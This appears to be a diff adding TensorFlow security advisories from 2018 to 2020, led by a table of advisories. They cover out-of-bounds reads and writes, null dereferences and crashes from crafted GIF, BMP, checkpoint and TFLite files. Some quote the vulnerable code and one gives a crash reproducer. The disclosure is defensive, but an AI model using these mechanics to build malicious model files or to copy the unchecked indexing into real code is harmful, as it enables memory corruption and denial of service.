| [TFSA-2020-029](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2020-029.md) | Uninitialized memory access in Eigen types | >= 1.15.0, <= 2.3.0 | (discovered internally) |
| [TFSA-2020-028](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2020-028.md) | Float cast overflow undefined behavior | <= 2.3 | (Reported on GitHub) | [issue report](https://github.com/tensorflow/tensorflow/issues/42129)
| [TFSA-2020-027](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2020-027.md) | Segfault in `tf.quantization.quantize_and_dequantize` | <= 2.3 | (Reported on GitHub) | [issue report](https://github.com/tensorflow/tensorflow/issues/42105)
| [TFSA-2020-026](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2020-026.md) | Segfault in `tf.raw_ops.Switch` in eager mode | 2.2.0, 2.3.0 | Aivul Team from Qihoo 360 |
| [TFSA-2020-025](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2020-025.md) | Undefined behavior in `dlpack.to_dlpack` | 2.2.0, 2.3.0 | Aivul Team from Qihoo 360 |
| [TFSA-2020-024](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2020-024.md) | Memory leak in `dlpack.to_dlpack` | 2.2.0, 2.3.0 | Aivul Team from Qihoo 360 |
| [TFSA-2020-023](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2020-023.md) | Memory corruption in `dlpack.to_dlpack` | 2.2.0, 2.3.0 | Aivul Team from Qihoo 360 |
| [TFSA-2020-022](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2020-022.md) | Crash due to invalid shape of `grad_values` in SparseFillEmptyRowsGrad | >= 1.15.0, <= 2.3.0 | (variant analysis, Aivul Team from Qihoo 360) |
| [TFSA-2020-021](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2020-021.md) | Heap buffer overflow in SparseFillEmptyRowsGrad | >= 1.15.0, <= 2.3.0 | Aivul Team from Qihoo 360 |
| [TFSA-2020-020](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2020-020.md) | Heap buffer overflow in weighted sparse count ops | 2.3.0 | (variant analysis, Aivul Team from Qihoo 360) |
| [TFSA-2020-019](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2020-019.md) | Crash due to invalid splits in SparseCountSparseOutput | 2.3.0 | (variant analysis, Aivul Team from Qihoo 360) |
| [TFSA-2020-018](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2020-018.md) | Heap buffer overflow due to invalid indices in SparseCountSparseOutput | 2.3.0 | (variant analysis, Aivul Team from Qihoo 360) |
| [TFSA-2020-017](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2020-017.md) | Abort due to invalid splits in RaggedCountSparseOutput | 2.3.0 | (variant analysis, Aivul Team from Qihoo 360) |
| [TFSA-2020-016](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2020-016.md) | Segfault due to invalid splits in RaggedCountSparseOutput | 2.3.0 | (variant analysis, Aivul Team from Qihoo 360) |
| [TFSA-2020-015](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2020-015.md) | Heap buffer overflow due to invalid splits in RaggedCountSparseOutput | 2.3.0 | Aivul Team from Qihoo 360 |
| [TFSA-2020-014](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2020-014.md) | Integer truncation in Shard API usage | >= 1.15.0, <= 2.3.0 | Aivul Team from Qihoo 360 |
| [TFSA-2020-013](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2020-013.md) | Format-string vulnerability in TensorFlow's `as_string` | >= 1.15.0, <= 2.3.0 | Aivul Team from Qihoo 360 |
| [TFSA-2020-012](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2020-012.md) | Segfault by calling session-only ops in eager mode | >= 1.15.0, <= 2.3.0 | Aivul Team from Qihoo 360 |
| [TFSA-2020-011](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2020-011.md) | Data leak in `tf.raw_ops.StringNGrams` | >= 1.15.0, <= 2.3.0 | Aivul Team from Qihoo 360 |
| [TFSA-2020-010](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2020-010.md) | Incomplete validation in TensorFlow's SavedModel's constant nodes causes segfaults | >= 1.15.0, <= 2.3.0 | Shuaike Dong, Alipay Tian Qian Security Lab | [issue report](https://github.com/tensorflow/tensorflow/issues/41097)
| [TFSA-2020-009](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2020-009.md) | Segfault and data corruption caused by negative indexing in TFLite | >= 1.15.0, <= 2.3.0 | Aivul Team from Qihoo 360 |
| [TFSA-2020-008](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2020-008.md) | Data corruption due to dimension mismatch in TFLite | >= 1.15.0, <= 2.3.0 | Aivul Team from Qihoo 360 |
| [TFSA-2020-007](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2020-007.md) | Null pointer dereference in TFLite | >= 1.15.0, <= 2.3.0 | Aivul Team from Qihoo 360, variant analysis |
| [TFSA-2020-006](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2020-006.md) | Segmentation fault and/or data corruption due to invalid TFLite model | >= 1.15.0, <= 2.3.0 | (variant analysis, Aivul Team from Qihoo 360) |
| [TFSA-2020-005](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2020-005.md) | Out of bounds access in TFLite operators | >= 1.15.0, <= 2.3.0 | Aivul Team from Qihoo 360 |
| [TFSA-2020-004](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2020-004.md) | Out of bounds access in TFLite implementation of segment sum | 2.2.0, 2.3.0 | (variant analysis, Aivul Team from Qihoo 360) |
| [TFSA-2020-003](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2020-003.md) | Denial of service from TFLite implementation of segment sum | 2.2.0, 2.3.0 | (variant analysis, Aivul Team from Qihoo 360) |
| [TFSA-2020-002](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2020-002.md) | Out of bounds write in TFLite implementation of segment sum | 2.2.0, 2.3.0 | Aivul Team from Qihoo 360 |
| [TFSA-2020-001](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2020-001.md) | Segmentation fault when converting a Python string to `tf.float16` | >= 1.12.0, <= 2.1 | (found internally) |
| [TFSA-2019-002](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2019-002.md) | Heap buffer overflow in `UnsortedSegmentSum` | <= 1.14 | (found internally) |
| [TFSA-2019-001](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2019-001.md) | Null Pointer Dereference Error in Decoding GIF Files | <= 1.12 | Baidu Security Lab |
| [TFSA-2018-006](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2018-006.md) | Crafted Configuration File results in Invalid Memory Access | <= 1.7 | Blade Team of Tencent |
| [TFSA-2018-005](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2018-005.md) | Old Snappy Library Usage Resulting in Memcpy Parameter Overlap | <= 1.7 | Blade Team of Tencent |
| [TFSA-2018-004](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2018-004.md) | Checkpoint Meta File Out-of-Bounds Read | <= 1.7 | Blade Team of Tencent |
| [TFSA-2018-003](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2018-003.md) | TensorFlow Lite TOCO FlatBuffer Parsing Vulnerability | <= 1.7 | Blade Team of Tencent |
| [TFSA-2018-002](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2018-002.md) | GIF File Parsing Null Pointer Dereference Error | <= 1.5 | Blade Team of Tencent |
| [TFSA-2018-001](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2018-001.md) | BMP File Parser Out-of-bounds Read | <= 1.6 | Blade Team of Tencent |
| - | Out Of Bounds Read | <= 1.4 | Blade Team of Tencent | [issue report](https://github.com/tensorflow/tensorflow/issues/14959)
@@ -0,0 +1,34 @@
## TFSA-2018-001: BMP File Parser Out-of-bounds Read.
### CVE Number
CVE-2018-21233
### Issue Description
The BMP (bitmap image file graphics format) decoder had an out-of-bounds read
due to insufficient checking of header sizes and signed integer values.
### Impact
The most likely consequence of this vulnerability would be that an invalid BMP
file could lead to an unhandled process crash, but may permit read access to
unintended regions of the TensorFlow process memory.
### Vulnerable Versions
TensorFlow 1.3.0, 1.3.1, 1.4.0, 1.4.1, 1.5.0, 1.5.1, 1.6.0
### Mitigation
We have patched the vulnerability in GitHub commit
[49f73c55](https://github.com/tensorflow/tensorflow/commit/49f73c55d56edffebde4bca4a407ad69c1cae433).
If users are running TensorFlow in production or on untrusted data, they are
encouraged to apply this patch.
Additionally, this patch has already been integrated into TensorFlow 1.7.0 and
newer.
### Credits
This issue was discovered by the Blade Team of Tencent.
@@ -0,0 +1,33 @@
## TFSA-2018-002: GIF File Parsing Null Pointer Dereference Error
### CVE Number
CVE-2018-7576
### Issue Description
When parsing certain invalid GIF files, an internal function in the GIF decoder
returned a null pointer, which was subsequently used as an argument to strcat.
### Impact
A maliciously crafted GIF could be used to cause the TensorFlow process to
crash.
### Vulnerable Versions
TensorFlow 1.0.0, 1.0.1, 1.1.0, 1.2.0, 1.2.1, 1.3.0, 1.3.1, 1 1.4.1, 1.5.0, 1.5.1
### Mitigation
We have patched the vulnerability in GitHub commit
[c4843158](https://github.com/tensorflow/tensorflow/commit/c48431588e7cf8aff61d4c299231e3e925144df8).
If users are running TensorFlow in production or on untrusted data, they are
encouraged to apply this patch.
Additionally, this patch has already been integrated into TensorFlow 1.6.0 and
newer.
### Credits
This issue was discovered by the Blade Team of Tencent.
@@ -0,0 +1,48 @@
## TFSA-2018-003: TensorFlow Lite TOCO FlatBuffer Parsing Vulnerability
### CVE Number
CVE-2018-8825
### Issue Description
The TensorFlow Lite TOCO compiler does not perform correct boundary checks when
reading from some fields within TFLite files.
As background, TFLite files are based on the FlatBuffers serialization format,
which does not have bounds checking built-in, rather it relies on the clients to
handle the appropriate security checks by themselves.
In particular, TOCO is not performing correct bounds checks in the following places:
* Out of bounds read in TOCO in import.cc:42
* Null dereference in TOCO in import.cc:135
* Out of bounds read in TOCO in import.cc:104
* Null dereference in TOCO in import.cc:121
* Out of bounds read in TOCO in import.cc:62
* Out of bounds read in TOCO in operator.cc:48
* Out of bounds read in TOCO graph_transformations (propagate_fixed_sizes.cc:93)
### Impact
Users passing a malformed or malicious version of a TFLite graph into TOCO will
cause TOCO to crash or cause a buffer overflow, potentially allowing malicious
code to be executed.
### Vulnerable Versions
TensorFlow 1.5.0, 1.5.1, 1.6.0, 1.7.0
### Mitigation
We have patched the vulnerability in GitHub commits [41335abb](https://github.com/tensorflow/tensorflow/commit/41335abb46f80ca644b5738550daef6136ba5476) and
[8badd11d](https://github.com/tensorflow/tensorflow/commit/8badd11d875a826bd318ed439909d5c47a7fb811).
If users are running the TensorFlow TFLite TOCO compiler in production or on
untrusted data, they are encouraged to apply this patch.
Additionally, we have released TensorFlow version 1.7.1 to mitigate this
vulnerability.
### Credits
This issue was discovered by the Blade Team of Tencent.
@@ -0,0 +1,35 @@
## TFSA-2018-004: Checkpoint Meta File Out-of-Bounds Read
### CVE Number
CVE-2018-7575
### Issue Description
The block size in meta file might contain a large int64 value which causes
an integer overflow upon addition. Subsequent code using n as index may cause
an out-of-bounds read.
### Impact
A maliciously crafted meta checkpoint could be used to cause the TensorFlow
process to perform an out of bounds read on in process memory.
### Vulnerable Versions
TensorFlow 1.0.0, 1.0.1, 1.1.0, 1.2.0, 1.2.1, 1.3.0, 1.3.1, 1.4.0, 1.4.1, 1.5.0, 1.5.1, 1.6.0, 1.7.0
### Mitigation
We have patched the vulnerability in GitHub commit
[d107fee1](https://github.com/tensorflow/tensorflow/commit/d107fee1e4a9a4462f01564798d345802acc2aef).
If users are running TensorFlow on untrusted meta checkpoints, such as those
downloaded from the Internet, in production or on untrusted data, they are
encouraged to apply this patch.
Additionally, we have released TensorFlow version 1.7.1 to mitigate this
vulnerability.
### Credits
This issue was discovered by the Blade Team of Tencent.
@@ -0,0 +1,37 @@
## TFSA-2018-005: Old Snappy Library Usage Resulting in Memcpy Parameter Overlap
### CVE Number
CVE-2018-7577
### Issue Description
TensorFlow checkpoint meta file uses Google's
[snappy](https://github.com/google/snappy) compression/decompression library.
There is a memcpy-param-overlap issue in the version of snappy currently used by
TensorFlow.
### Impact
A maliciously crafted checkpoint meta file could cause TensorFlow to crash or
read from other parts of its process memory.
### Vulnerable Versions
TensorFlow 1.1.0, 1.2.0, 1.2.1, 1.3.0, 1.3.1, 1.4.0, 1.4.1, 1.5.0, 1.5.1, 1.6.0, 1.7.0
### Mitigation
We have patched the vulnerability in GitHub commit
[dfa9921e](https://github.com/tensorflow/tensorflow/commit/dfa9921e6343727b05f42f8d4a918b19528ff994)
by upgrading the version of the snappy library used by TensorFlow to v1.1.7.
If users are loading untrusted checkpoints in TensorFlow, we encourage users to
apply the patch to upgrade snappy.
Additionally, we have released TensorFlow version 1.7.1 to mitigate this
vulnerability.
### Credits
This issue was discovered by the Blade Team of Tencent.
@@ -0,0 +1,35 @@
## TFSA-2018-006: Crafted Configuration File results in Invalid Memory Access
### CVE Number
CVE-2018-10055
### Issue Description
A maliciously crafted configuration file passed into the TensorFlow XLA compiler
could cause an invalid memory access and/or a heap buffer overflow.
### Impact
A maliciously crafted configuration file could cause TensorFlow to crash or
read from other parts of its process memory.
### Vulnerable Versions
TensorFlow 1.1.0, 1.2.0, 1.2.1, 1.3.0, 1.3.1, 1.4.0, 1.4.1, 1.5.0, 1.5.1, 1.6.0, 1.7.0
### Mitigation
We have patched the vulnerability in GitHub commit
[c89ab82a](https://github.com/tensorflow/tensorflow/commit/c89ab82a82585cdaa90bf4911980e9e845909e78).
If users are loading untrusted configurations in TensorFlow, we encourage users
to apply the patch to upgrade snappy or upgrade the version of TensorFlow they
are currently using.
Additionally, we have released TensorFlow version 1.7.1 to mitigate this
vulnerability.
### Credits
This issue was discovered by the Blade Team of Tencent.
@@ -0,0 +1,35 @@
## TFSA-2019-001: Null Pointer Dereference Error in Decoding GIF Files
### CVE Number
CVE-2019-9635
### Issue Description
Certain invalid GIF files can produce a null pointer dereference when reading
from the color map of a frame if the color map is missing.
### Impact
A maliciously crafted GIF file could cause a denial of service attack for
TensorFlow by making it crash.
### Vulnerable Versions
TensorFlow 1.0.0, 1.0.1, 1.1.0, 1.2.0, 1.2.1, 1.3.0, 1.3.1, 1.4.0, 1.4.1, 1.5.0,
1.5.1, 1.6.0, 1.7.0, 1.7.1, 1.8.0, 1.9.0, 1.10.0, 1.10.1, 1.11.0, 1.12.0
### Mitigation
We have patched the vulnerability in GitHub commit
[e41cb124](https://github.com/tensorflow/tensorflow/commit/e41cb124cd0b325821af85cdacd9d8a12e206418).
If users are loading untrusted configurations in TensorFlow, we encourage users
to apply the patch to upgrade the version of TensorFlow they are currently using.
Additionally, we have released TensorFlow version 1.12.2 to mitigate this
vulnerability. Versions 1.13.0 and later were released using the patched commit.
### Credits
This issue was discovered by Yakun Zhang and Zheng Huang of Baidu Security Lab.
@@ -0,0 +1,33 @@
## TFSA-2019-002: Heap buffer overflow in `UnsortedSegmentSum`
### CVE Number
CVE-2019-16778
### Issue Description
A heap buffer overflow in `UnsortedSegmentSum` can be produced when the `Index`
template argument is `int32`. In this case `data_size` and `num_segments` fields
are truncated from `int64` to `int32` and can produce negative numbers,
resulting in accessing out of bounds heap memory.
### Impact
This is unlikely to be exploitable and was detected and fixed internally. We are
making the security advisory only to notify users that it is better to update to
TensorFlow 1.15 or 2.0 or later as these versions already have this fixed.
### Vulnerable Versions
TensorFlow 1.0.0, 1.0.1, 1.1.0, 1.2.0, 1.2.1, 1.3.0, 1.3.1, 1.4.0, 1.4.1, 1.5.0,
1.5.1, 1.6.0, 1.7.0, 1.7.1, 1.8.0, 1.9.0, 1.10.0, 1.10.1, 1.11.0, 1.12.0,
1.12.1, 1.12.2, 1.12.3, 1.13.0, 1.13.1, 1.13.2, 1.14.0.
### Mitigation
We have patched the vulnerability in GitHub commit
[db4f971](https://github.com/tensorflow/tensorflow/commit/db4f9717c41bccc3ce10099ab61996b246099892).
We encourage users to switch to TensorFlow 1.15 or 2.0 as these versions contain
the fix. If switching is undesirable, consider cherry-picking the above commit
and building from source.
@@ -0,0 +1,41 @@
## TFSA-2020-001: Segmentation fault when converting a Python string to `tf.float16`
### CVE Number
CVE-2020-5215
### Issue Description
Converting a string (from Python) to a `tf.float16` value results in a
segmentation fault in eager mode as the format checks for this use case are only
in the graph mode.
### Impact
This issue can lead to denial of service in inference/training where a malicious
attacker can send a data point which contains a string instead of a `tf.float16`
value.
Similar effects can be obtained by manipulating saved models and checkpoints
whereby replacing a scalar `tf.float16` value with a scalar string will trigger
this issue due to automatic conversions.
This can be easily reproduced by `tf.constant("hello", tf.float16)`, if eager
execution is enabled.
### Vulnerable Versions
TensorFlow 1.12.0, 1.12.1, 1.12.2, 1.12.3, 1.13.0, 1.13.1, 1.13.2, 1.14.0,
1.15.0, 2.0.0.
### Mitigation
We have patched the vulnerability in GitHub commit
[5ac1b9](https://github.com/tensorflow/tensorflow/commit/5ac1b9e24ff6afc465756edf845d2e9660bd34bf).
We are additionally releasing TensorFlow 1.15.2 and 2.0.1 with this
vulnerability patched.
TensorFlow 2.1.0 was released after we fixed the issue, thus it is not affected.
We encourage users to switch to TensorFlow 1.15.2, 2.0.1 or 2.1.0.
@@ -0,0 +1,68 @@
## TFSA-2020-002: Out of bounds write in TFLite implementation of segment sum
### CVE Number
CVE-2020-15214
### Impact
In TensorFlow Lite models using segment sum can trigger a write out bounds /
segmentation fault if the segment ids are not sorted. Code assumes that the
segment ids are in increasing order, [using the last element of the tensor
holding them to determine the dimensionality of output
tensor](https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/lite/kernels/segment_sum.cc#L39-L44):
```cc
if (segment_id_size > 0) {
max_index = segment_ids->data.i32[segment_id_size - 1];
}
TfLiteIntArray* output_shape = TfLiteIntArrayCreate(NumDimensions(data));
output_shape->data[0] = max_index + 1;
```
This results in allocating insufficient memory for the output tensor and in a
[write outside the bounds of the output
array](https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/lite/kernels/internal/reference/reference_ops.h#L2625-L2631):
```cc
memset(output_data, 0, sizeof(T) * output_shape.FlatSize());
for (int i = 0; i < input_shape.Dims(0); i++) {
int output_index = segment_ids_data[i];
for (int j = 0; j < segment_flat_size; ++j) {
output_data[output_index * segment_flat_size + j] +=
input_data[i * segment_flat_size + j];
}
}
```
This usually results in a segmentation fault, but depending on runtime
conditions it can provide for a write gadget to be used in future memory
corruption-based exploits.
### Vulnerable Versions
TensorFlow 2.2.0, 2.3.0.
### Patches
We have patched the issue in
[204945b](https://github.com/tensorflow/tensorflow/commit/204945b) and will
release patch releases for all affected versions.
We recommend users to upgrade to TensorFlow 2.2.1, or 2.3.1.
### Workarounds
A potential workaround would be to add a custom `Verifier` to the model loading
code to ensure that the segment ids are sorted, although this only handles the
case when the segment ids are stored statically in the model.
A similar validation could be done if the segment ids are generated at runtime
between inference steps.
If the segment ids are generated as outputs of a tensor during inference steps,
then there are no possible workaround and users are advised to upgrade to
patched code.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by members of the Aivul Team from Qihoo
360.
@@ -0,0 +1,54 @@
## TFSA-2020-003: Denial of service from TFLite implementation of segment sum
### CVE Number
CVE-2020-15213
### Impact
In TensorFlow Lite models using segment sum can trigger a denial of service by
causing an out of memory allocation in the implementation of segment sum. Since
code uses the last element of the tensor holding them to determine the
dimensionality of output tensor, attackers can use a very large value to trigger
a [large
allocation](https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/lite/kernels/segment_sum.cc#L39-L48):
```cc
if (segment_id_size > 0) {
max_index = segment_ids->data.i32[segment_id_size - 1];
}
TfLiteIntArray* output_shape = TfLiteIntArrayCreate(NumDimensions(data));
output_shape->data[0] = max_index + 1;
for (int i = 1; i < data_rank; ++i) {
output_shape->data[i] = data->dims->data[i];
}
return context->ResizeTensor(context, output, output_shape);
```
### Vulnerable Versions
TensorFlow 2.2.0, 2.3.0.
### Patches
We have patched the issue in
[204945b](https://github.com/tensorflow/tensorflow/commit/204945b) and will
release patch releases for all affected versions.
We recommend users to upgrade to TensorFlow 2.2.1, or 2.3.1.
### Workarounds
A potential workaround would be to add a custom `Verifier` to limit the maximum
value in the segment ids tensor. This only handles the case when the segment ids
are stored statically in the model, but a similar validation could be done if
the segment ids are generated at runtime, between inference steps.
However, if the segment ids are generated as outputs of a tensor during
inference steps, then there are no possible workaround and users are advised to
upgrade to patched code.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been discovered through a variant analysis of [a
vulnerability reported by members of the Aivul Team from Qihoo
360](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2020-002.md).
@@ -0,0 +1,59 @@
## TFSA-2020-004: Out of bounds access in TFLite implementation of segment sum
### CVE Number
CVE-2020-15212
### Impact
In TensorFlow Lite models using segment sum can trigger [writes outside of
bounds of heap allocated
buffers](https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/lite/kernels/internal/reference/reference_ops.h#L2625-L2631)
by inserting negative elements in the segment ids tensor:
```cc
for (int i = 0; i < input_shape.Dims(0); i++) {
int output_index = segment_ids_data[i];
for (int j = 0; j < segment_flat_size; ++j) {
output_data[output_index * segment_flat_size + j] +=
input_data[i * segment_flat_size + j];
}
}
```
Users having access to `segment_ids_data` can alter `output_index` and then
write to outside of `output_data` buffer.
This might result in a segmentation fault but it can also be used to further
corrupt the memory and can be chained with other vulnerabilities to create more
advanced exploits.
### Vulnerable Versions
TensorFlow 2.2.0, 2.3.0.
### Patches
We have patched the issue in
[204945b](https://github.com/tensorflow/tensorflow/commit/204945b) and will
release patch releases for all affected versions.
We recommend users to upgrade to TensorFlow 2.2.1, or 2.3.1.
### Workarounds
A potential workaround would be to add a custom `Verifier` to the model loading
code to ensure that the segment ids are all positive, although this only handles
the case when the segment ids are stored statically in the model.
A similar validation could be done if the segment ids are generated at runtime
between inference steps.
If the segment ids are generated as outputs of a tensor during inference steps,
then there are no possible workaround and users are advised to upgrade to
patched code.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been discovered through a variant analysis of [a
vulnerability reported by members of the Aivul Team from Qihoo
360](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2020-002.md).
@@ -0,0 +1,84 @@
## TFSA-2020-005: Out of bounds access in TFLite operators
### CVE Number
CVE-2020-15211
### Impact
In TensorFlow Lite, saved models in the flatbuffer format use a double indexing
scheme: a model has a set of subgraphs, each subgraph has a set of operators and
each operator has a set of input/output tensors. The flatbuffer format uses
indices for the tensors, indexing into an array of tensors that is owned by the
subgraph. This results in a pattern of double array indexing when trying to
[get the data of each
tensor](https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/lite/kernels/kernel_util.cc#L36):
```cc
return &context->tensors[node->inputs->data[index]];
```
However, some operators can have some tensors be optional. To handle this
scenario, the flatbuffer model uses a negative `-1` value as [index for these tensors](https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/lite/c/common.h#L82):
```cc
#define kTfLiteOptionalTensor (-1)
```
This results in [special casing during validation at model loading
time](https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/lite/core/subgraph.cc#L566-L580):
```cc
for (int i = 0; i < length; i++) {
int index = indices[i];
// Continue if index == kTfLiteOptionalTensor before additional comparisons
// below, size_t(-1) is always >= context_tensors_size.
if (index == kTfLiteOptionalTensor) {
continue;
}
if (index < 0 || static_cast<size_t>(index) >= context_.tensors_size) {
ReportError(
"Invalid tensor index %d in %s. The subgraph has %d tensors\n", index,
label, context_.tensors_size);
consistent_ = false;
return kTfLiteError;
}
}
```
Unfortunately, this means that the `-1` index is a valid tensor index for any
operator, including those that don't expect optional inputs and including for
output tensors. Thus, this allows writing and reading from outside the bounds of
heap allocated arrays, although only at a specific offset from the start of
these arrays.
This results in both read and write gadgets, albeit very limited in scope.
### Vulnerable Versions
TensorFlow 1.15.0, 1.15.1, 1.15.2, 1.15.3, 2.0.0, 2.0.1, 2.0.2, 2.1.0, 2.1.1,
2.2.0, 2.3.0.
### Patches
We have patched the issue in several commits
([46d5b0852](https://github.com/tensorflow/tensorflow/commit/46d5b0852),
[00302787b7](https://github.com/tensorflow/tensorflow/commit/00302787b7),
[e11f5558](https://github.com/tensorflow/tensorflow/commit/e11f5558),
[cd31fd0ce](https://github.com/tensorflow/tensorflow/commit/cd31fd0ce),
[1970c21](https://github.com/tensorflow/tensorflow/commit/1970c21), and
[fff2c83](https://github.com/tensorflow/tensorflow/commit/fff2c83)). We will
release patch releases for all versions between 1.15 and 2.3.
We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or
2.3.1.
### Workarounds
A potential workaround would be to add a custom `Verifier` to the model loading
code to ensure that only operators which accept optional inputs use the `-1`
special value and only for the tensors that they expect to be optional. Since
this allow-list type approach is erro-prone, we advise upgrading to the patched
code.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by members of the Aivul Team from Qihoo
360.
@@ -0,0 +1,38 @@
## TFSA-2020-006: Segmentation fault and/or data corruption due to invalid TFLite model
### CVE Number
CVE-2020-15210
### Impact
If a TFLite saved model uses the same tensor as both input and output of an
operator, then, depending on the operator, we can observe a segmentation fault
or just memory corruption.
### Vulnerable Versions
TensorFlow 1.15.0, 1.15.1, 1.15.2, 1.15.3, 2.0.0, 2.0.1, 2.0.2, 2.1.0, 2.1.1,
2.2.0, 2.3.0.
### Patches
We have patched the issue in
[d58c96946b](https://github.com/tensorflow/tensorflow/commit/d58c96946b) and
will release patch releases for all versions between 1.15 and 2.3.
We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or
2.3.1.
### Workarounds
A potential workaround would be to add a custom `Verifier` to the model loading
code to ensure that no operator reuses tensors as both inputs and outputs. Care
should be taken to check all types of inputs (i.e., constant or variable tensors
as well as optional tensors).
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been discovered through a variant analysis of [a
vulnerability reported by members of the Aivul Team from Qihoo
360](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2020-005.md).
@@ -0,0 +1,52 @@
## TFSA-2020-007: Null pointer dereference in TFLite
### CVE Number
CVE-2020-15209
### Impact
A crafted TFLite model can force a node to have as input a tensor backed by a
`nullptr` buffer. This can be achieved by changing a buffer index in the
flatbuffer serialization to convert a read-only tensor to a read-write one. The
runtime assumes that these buffers are written to before a possible read, hence
they are [initialized with
`nullptr`](https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/lite/core/subgraph.cc#L1224-L1227):
```cc
TfLiteTensorReset(type, name, ConvertArrayToTfLiteIntArray(rank, dims),
GetLegacyQuantization(quantization),
/*buffer=*/nullptr, required_bytes, allocation_type,
nullptr, is_variable, &tensor);
```
However, by changing the buffer index for a tensor and implicitly converting
that tensor to be a read-write one, as there is nothing in the model that writes
to it, we get a null pointer dereference.
### Vulnerable Versions
TensorFlow 1.15.0, 1.15.1, 1.15.2, 1.15.3, 2.0.0, 2.0.1, 2.0.2, 2.1.0, 2.1.1,
2.2.0, 2.3.0.
### Patches
We have patched the issue in
[0b5662bc](https://github.com/tensorflow/tensorflow/commit/0b5662bc) and will
release patch releases for all versions between 1.15 and 2.3.
We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or
2.3.1.
### Workarounds
A potential workaround would be to add a custom `Verifier` to the model loading
code to ensure that no operator reuses tensors as both inputs and outputs. Care
should be taken to check all types of inputs (i.e., constant or variable tensors
as well as optional tensors).
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been discovered by members of the Aivul Team and is also
discoverable through a variant analysis of [another
vulnerability reported by members of the Aivul Team from Qihoo
360](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2020-005.md).
